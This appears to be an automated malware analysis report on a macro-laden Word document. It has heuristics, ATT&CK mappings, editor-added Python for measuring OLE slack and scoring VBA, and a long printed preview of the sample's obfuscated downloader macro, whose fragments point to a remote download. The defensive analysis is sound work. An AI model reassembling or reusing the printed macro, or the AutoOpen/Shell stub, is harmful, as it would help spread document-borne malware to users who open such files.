Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample contains a legacy WordBasic AutoOpen auto-execution marker together with high-severity heuristics for VBA macros and a Shell() call, which together indicate malicious intent. The extracted VBA is heavily obfuscated (string literals split into junk fragments and concatenated, working substrings pulled out with Mid()) and appears to be designed to download and execute a second-stage payload; the download location is not recoverable from the preview. The "URLs" extracted from the document body (see Embedded URL below) contain the same nJ6+nJ filler that pads the macro's string literals, so they are obfuscation residue rather than usable network indicators. The large slack space in the OLE structure is also a common characteristic of packed or obfuscated malware.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 228,352 bytes but its declared streams total only 24,669 bytes; 203,683 bytes (89%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://wounJ6+nJjiB97Q3t8JsD (in document text, OLE body)
  - http://nJ6dHdFIpP8P9dwvzESC (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
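The OLE_SLACK_ANOMALY figure above is file size minus the sum of declared stream sizes, so it also counts the header, FAT and directory sectors and the padding at the end of each stream's last sector. The following added example (editor's code, not part of the original report and not the implementation of any tool named on this page) parses the CFB header, DIFAT and FAT directly to separate sectors that no stream chain references from that structural overhead. It runs on a constructed test file with two planted slack sectors, not on the analysed sample; the stream name "Test" and all sizes in the builder are assumptions.

```python
import struct

# CFB/OLE2 constants (MS-CFB).
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FREESECT, ENDOFCHAIN, FATSECT, NOSTREAM = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFF
STREAM, ROOT = 2, 5


def _sector_offset(sid, sec):
    return (sid + 1) * sec  # sector 0 starts right after the one-sector header


def _read_fat(data, sec):
    """Return the FAT as a flat list, collecting FAT sector IDs from the DIFAT."""
    num_fat = struct.unpack_from("<I", data, 44)[0]
    first_difat, num_difat = struct.unpack_from("<II", data, 68)
    fat_sids = [s for s in struct.unpack_from("<109I", data, 76) if s != FREESECT]
    per = sec // 4
    s = first_difat
    for _ in range(num_difat):  # each DIFAT sector: per-1 FAT sids + next pointer
        ents = struct.unpack_from(f"<{per}I", data, _sector_offset(s, sec))
        fat_sids.extend(e for e in ents[:-1] if e != FREESECT)
        s = ents[-1]
    fat = []
    for fs in fat_sids[:num_fat]:
        fat.extend(struct.unpack_from(f"<{per}I", data, _sector_offset(fs, sec)))
    return fat


def _chain(fat, start):
    """Walk a FAT chain; stops at ENDOFCHAIN/out-of-range values and on loops."""
    seen, out, s = set(), [], start
    while s < len(fat) and s not in seen:
        seen.add(s)
        out.append(s)
        s = fat[s]
    return out


def _directory(data, sec, fat):
    """Yield (name, type, start_sector, size) for each used directory entry."""
    first_dir = struct.unpack_from("<I", data, 48)[0]
    major = struct.unpack_from("<H", data, 26)[0]
    for sid in _chain(fat, first_dir):
        for i in range(sec // 128):
            off = _sector_offset(sid, sec) + i * 128
            if off + 128 > len(data):
                return
            typ = data[off + 66]
            if typ == 0:
                continue
            name_len = struct.unpack_from("<H", data, off + 64)[0]
            name = data[off:off + max(name_len - 2, 0)].decode("utf-16-le", "replace")
            start, size = struct.unpack_from("<IQ", data, off + 116)
            if major == 3:  # v3 files only use the low 32 bits of the size field
                size &= 0xFFFFFFFF
            yield name, typ, start, size


def ole_slack_report(data: bytes) -> dict:
    if data[:8] != MAGIC:
        raise ValueError("not an OLE/CFB file")
    sec = 1 << struct.unpack_from("<H", data, 30)[0]
    cutoff = struct.unpack_from("<I", data, 56)[0]
    fat = _read_fat(data, sec)
    body = len(data) - sec
    n_sectors, tail = body // sec, body % sec
    # Sectors marked free, or lying beyond the FAT's coverage, belong to no
    # stream chain: a normal OLE reader never touches the bytes stored there.
    free = [sid for sid in range(n_sectors) if sid >= len(fat) or fat[sid] == FREESECT]
    declared = padding = 0
    for _name, typ, start, size in _directory(data, sec, fat):
        if typ != STREAM:
            continue
        declared += size
        if size >= cutoff:  # smaller streams live inside the root's mini stream
            padding += len(_chain(fat, start)) * sec - size
    unalloc = len(free) * sec + tail
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "unaccounted_bytes": len(data) - declared,  # the report's coarse figure
        "unallocated_sectors": len(free),
        "unallocated_bytes": unalloc,               # true sector slack (+ tail)
        "unallocated_pct": round(100.0 * unalloc / len(data), 1),
        "intra_sector_padding": padding,
    }


def build_sample_ole(junk_sectors: int = 2) -> bytes:
    """Constructed test input (assumption, not the analysed sample): a minimal v3
    CFB with one 4,200-byte stream over nine sectors, then `junk_sectors`
    sectors that no FAT chain references, i.e. planted sector slack."""
    sec = 512
    hdr = bytearray(sec)
    hdr[0:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 24, 0x3E, 3, 0xFFFE, 9, 6)  # v3, 512-byte sectors
    # dir sectors (v3: 0), FAT sectors, first dir sector, txn, mini cutoff,
    # first mini-FAT, mini-FAT count, first DIFAT, DIFAT count
    struct.pack_into("<9I", hdr, 40, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 76, 0, *[FREESECT] * 108)  # FAT is sector 0
    n_stream = 9
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 2 + n_stream)) + [ENDOFCHAIN]
    fat += [FREESECT] * (sec // 4 - len(fat))
    fat_sector = struct.pack(f"<{sec // 4}I", *fat)

    def entry(name, typ, child, start, size):
        e = bytearray(128)
        enc = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(enc)] = enc
        struct.pack_into("<HBBIII", e, 64, len(enc), typ, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 116, start, size)
        return bytes(e)

    directory = entry("Root Entry", ROOT, 1, ENDOFCHAIN, 0)
    directory += entry("Test", STREAM, NOSTREAM, 2, 4200) + bytes(128) * 2
    stream = (b"A" * 4200).ljust(n_stream * sec, b"\x00")
    junk = b"\xCC" * (sec * junk_sectors)  # never referenced by the FAT
    return bytes(hdr) + fat_sector + directory + stream + junk


if __name__ == "__main__":
    print(ole_slack_report(build_sample_ole()))
```

Run against a real document, `unallocated_bytes` is the number to compare with the 203,683 figure: a small gap between the two means the slack is mostly sector padding and structure, a gap of the same order as the report's means large regions of the file that no stream reaches, which is where a carver should look next.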
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 89044 bytes |

SHA-256 (macros.bas): 06b58c5da114f78c2e27b95c4a5dace3ae782e71b96bebc099e8b8e643f95ebb

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "DzDCwfbVaEC"
Function ABtGcRvk()
MfsZiiqPN = ("wfiCuXiHOIWSS" + "wPnwnXAv" + "XaBYPZBLjNRC" + "KtPthairRBtwV" + "XfikoBtGcszO" + "MwqEBKLEtjuq") + ("QuGYIbuoif" + "dcAuDQWtSsSuaz" + "mJfdwotPlwAEk" + "TthRsbYKRB" + "MAXjzzfbQok" + "BjJjNOvD")
TknnhaZH = ("bKwcosuXcKaza" + "ImQpmWMzw" + "sDOBFHkKjb" + "ABvCidZ" + "IwHlYDzCWd" + "ccLdjli") + ("RVZPTwNIkUmDtm" + "qXlSpzHEOh" + "wZoYLRDjIEi" + "omLuNhkZMpCV" + "wSowJQL" + "tAoULJUAKiVH")
cTZEVkXjin = Mid("pwiaDp1jf3wPext(1, 343245)'+';RuUhuas nJ6+n'+'J6=nJ6+nJ6 naGo7+aGo7J6+nJ6RuUenvnJ6+nJ6:nJ6+nJ6pubnJ6+nJ6linJ6+nJ6caGoYjti", 13, 105)
vIAvimCiGHA = ("lVwzkdiV" + "csizjoWin" + "VcTjjkjhirLwVz" + "aiYhNVwFw" + "rdBAVNfa" + "hkSmPOEwAiHfXj") + ("IJzAadYXVWrG" + "hMdfVYQjIrI" + "IZwaqjUzS" + "LQizTJMwQYHZP" + "BbKzQDzSohSDc" + "fpXJMpANBWEHTM")
vSmYipJMXao = ("AjPGzKBGAKSRiu" + "KEDCDSSP" + "IZOwZZdUfPK" + "CfOCGUXLvf" + "jdjFmRR" + "hTlzawFhbjw") + ("OkqHYoAzzuEj" + "ThSqUrCOkcA" + "hoFAnwiwt" + "vmbjzRTimPBUG" + "mqGpwYiIq" + "rzuwJwZmkcmjO")
ODllU = ("kLjKIZPWUjO" + "tbzhQjPRbAwNZ" + "naovJjmrDWitU" + "PSCdzzHlDo" + "aDvzjNWkUlpiZ" + "fFCXbwWLsB") + ("wUPbfBWz" + "ifrrUIMI" + "lakcGRsFOcqROK" + "rlsGJojTjSoANK" + "SlOMHbY" + "NzjantJpTU")
Gunra = Mid("RCKYabYif7akHMJJ4hzZC1Avn9j2wiLKWR]110+[JbFPFl", 34, 7)
nzmkGffFk = ("tkuBplPNirOwq" + "AUNnwlpzXXYop" + "kdcGbRwLd" + "SEadQDiNIkm" + "PwjdzvNXd" + "vAdEOHU") + ("soqkVrKLjT" + "LjEcVOiWwSAzG" + "RJaALoasjszYic" + "SoOtiRVqYIqkl" + "GsqklEhkLU" + "OTwMiwjBiji")
iiIQJWBrMbA = ("lttbsrhJ" + "jAZVoVEujdVGo" + "hwqKaZZNY" + "MXmKKuFkNXNNT" + "daswlVRDz" + "MfBjGkOSbmI") + ("jtklYksRF" + "cdhAhccDVJ" + "LwitYddIumh" + "MrwMzzj" + "fVrCYzGC" + "qYQzqXuFszGO")
LBvPRpURARz = ("DYjwTCrVDpWd" + "GosYKhctOTwYdt" + "GjGpcHmL" + "IOiTzbY" + "TMXIrcUwBrpEiX" + "IjOUijBsUcnQw") + ("JunvCEQVCPGmra" + "zGWkYZnlH" + "QSUDfEMYwrzBJ" + "SZndzNwoadW" + "QfXZWJjElm" + "RXKuOsjSvwrRwm")
KhKnIJqU = Mid("wIIzn4nJ6+nJ6 nJ6+nJ6in RnJ6+nJ6unJ6'+'+nJ6UnJ6+'+'nJaGo7+aGo76baGo7+aGo7nJ6+nJ6cdnJ6+nJ6)nJ6+nJ6{b5iUFukj3nzL42QfZqw3C1", 7, 92)
zmZvbDz = ("KhvXUIiP" + "FozupHcUZXa" + "ENRFWTDHHw" + "zWLJGAizUWO" + "bCvincXZj" + "mGUiSzpiIUHOA") + ("dzVUuZGApu" + "DalPijYrJkFpc" + "jIpNtLMBYEqH" + "iJjlQZo" + "XEPiliXqm" + "HsmORRnvjc")
WuEEK = ("hiwvRTzRmbj" + "CzVulLhaX" + "idYWwUpjzK" + "TRkURXlqaQ" + "CqhftiQl" + "IFIETWuXcbD") + ("YwjilaUnvjz" + "VbipRbGT" + "hLOIfAuc" + "NwNidrwwH" + "vzjZIAjs" + "FFBVjRrmUZGZZ")
zhzrbS = ("CjZXjth" + "zpQoSJDajIc" + "KljjOQQrPwUpL" + "UXpGEopNn" + "qETEOrDnGmrR" + "pIPdqNA") + ("bcFojkcDoA" + "zzsJwMdYuhjYVD" + "AwoLwAnOPc" + "PiGbjSmuU" + "zwTQMpF" + "rDjlJkiPcCwKj")
wUrEMWwLFi = Mid("Ot6641qnQs'+'it'+'enJ6+aGo7+aGo7nJ6/vMP", 10, 27)
OhYKfoN = ("hWwurzqq" + "TzXPAmFIwI" + "WILdiMm" + "dXBiVmz" + "JFruwOl" + "VLCqzPRKQToY") + ("UQfLlNzS" + "CcBkvCFOH" + "XiHSJvFO" + "rRBzbsp" + "LjNBoPFJZpPTP" + "CMjAjNz")
rpdpDnfcm = ("aZzLRiUX" + "ECOJtTZkiaM" + "cGUJKLiM" + "MlllrzXAwPRz" + "hLFoHCiG" + "CqzzSfBGTlKtrR") + ("YBUCkjKuKUZ" + "DWEjifRi" + "ltjswrwjoOptcQ" + "hfWLrvp" + "tWzkOFfOaih" + "InJlsOOVFkPa")
BpjdpB = ("PfzrbzAfZr" + "NtfuGjOC" + "kGpuqlOp" + "aLbqqThBw" + "FIuPYMBLXRZQR" + "olIpEApl") + ("OwfiWCLN" + "nbwAprR" + "paqYrKuQCEKr" + "vzUwjQsiiIMEUd" + "NnvRYXLPumWol" + "UwAVHrdcC")
dsUCZpmpps = Mid("ziYRuUnsadanJ6+nJ6sdnJ6+nJ6 nJ6+nJ6= nnJ6+nJ6ew-objecnJ6+nJ6t ran'+'dom;nJ6+nJ6RunJ6+nJ6Ubcd'+' =nJ6+nJ6 nJaGo7+aGo76+nJ65nJ6+nJ6zahtnJ6+nJ6tp://nnJ6+n'+'J6inJ6+nJ6tinJ6+nJ6ndhannJ6+nJ6ji.cnJ6+niwtj8Rqf7", 4, 191)
iSfbrmBLOG = ("zwwIFrz" + "PnVAHhbJAOKviz" + "WkTchTYJHWdPGj" + "UrhpsAo" + "khnMFVEfcCEc" + "mOSdriOddR") + ("cutTNoEthA" + "vuGSnCrBNBEh" + "dPMAWZGGQSkK" + "lSnzLuXDTYX" + "qLmbESYNLp" + "cEWItcfbVILRYO")
NWhjaDmz = ("uvGHzETJF" + "XvKSlvZ" + "fnZTTiIYO" + "zJoDPXjYaoGHzA" + "qHMrLof" + "H
... (truncated)
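The VBA macros, Shell() and AutoOpen heuristics, and the "heavily obfuscated" characterisation, come from pattern matching over decoded macro text like the preview above. As an added example (editor's code, not the report engine's or olevba's implementation), the script below applies the same kind of checks to a constructed VBA snippet: auto-exec entry points, capability keywords, the density of split-and-concatenated string literals, and an emulation of VBA's 1-based Mid() so the sliced literal can be read off directly. The long concatenation line and the Mid() call are copied from the preview; the AutoOpen stub and the Shell line are assumed for the demonstration, and the join threshold is an illustrative assumption.

```python
import re

# Constructed input, not the analysed sample: an AutoOpen stub and a Shell()
# call (assumed) wrapped around two lines copied from the macro preview.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Sub AutoOpen()
    ABtGcRvk
End Sub
Function ABtGcRvk()
MfsZiiqPN = ("wfiCuXiHOIWSS" + "wPnwnXAv" + "XaBYPZBLjNRC" + "KtPthairRBtwV" + "XfikoBtGcszO" + "MwqEBKLEtjuq") + ("QuGYIbuoif" + "dcAuDQWtSsSuaz" + "mJfdwotPlwAEk" + "TthRsbYKRB" + "MAXjzzfbQok" + "BjJjNOvD")
Gunra = Mid("RCKYabYif7akHMJJ4hzZC1Avn9j2wiLKWR]110+[JbFPFl", 34, 7)
Shell Gunra, vbHide
End Function
'''

# Entry points Office runs with no user action beyond enabling macros.
AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open",
            "Workbook_Open", "Auto_Open")
# Keywords that give a macro process-launch or download capability.
SUSPICIOUS = ("Shell", "CreateObject", "WScript.Shell", "Environ",
              "URLDownloadToFile", "powershell")

LITERAL = r'"(?:[^"\n]|"")*"'          # a VBA string literal ("" escapes a quote)
MID_RE = re.compile(rf'\bMid\(\s*({LITERAL})\s*,\s*(\d+)\s*,\s*(\d+)\s*\)')
JOIN_RE = re.compile(r'"\s*[+&]\s*"')   # two literals glued with + or &


def find_autoexec(src):
    return [k for k in AUTOEXEC
            if re.search(rf"^\s*(Private\s+|Public\s+)?(Sub|Function)\s+{k}\b",
                         src, re.M | re.I)]


def find_suspicious(src):
    return [k for k in SUSPICIOUS
            if re.search(r"\b" + re.escape(k) + r"\b", src, re.I)]


def vba_mid_literals(src):
    """Emulate Mid(literal, start, length) with VBA's 1-based start index,
    so the substring the obfuscator actually uses can be read directly."""
    out = []
    for lit, start, length in MID_RE.findall(src):
        s = lit[1:-1].replace('""', '"')
        begin = int(start) - 1
        out.append(s[begin:begin + int(length)])
    return out


def concat_stats(src):
    lits = re.findall(LITERAL, src)
    mean_len = sum(len(l) - 2 for l in lits) / max(1, len(lits))
    return {"string_literals": len(lits),
            "concat_joins": len(JOIN_RE.findall(src)),
            "mean_literal_len": round(mean_len, 1)}


def assess(src, join_threshold=8):
    """join_threshold is an illustrative assumption, not a tuned value."""
    stats = concat_stats(src)
    return {"autoexec": find_autoexec(src),
            "suspicious": find_suspicious(src),
            "mid_slices": vba_mid_literals(src),
            **stats,
            "obfuscated": stats["concat_joins"] >= join_threshold}


if __name__ == "__main__":
    for key, value in assess(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The Mid() emulation is the useful part for triage: the literal on the page yields only a seven-character fragment, which is why a real deobfuscation pass has to follow the later concatenations and replacements rather than reading any one slice in isolation.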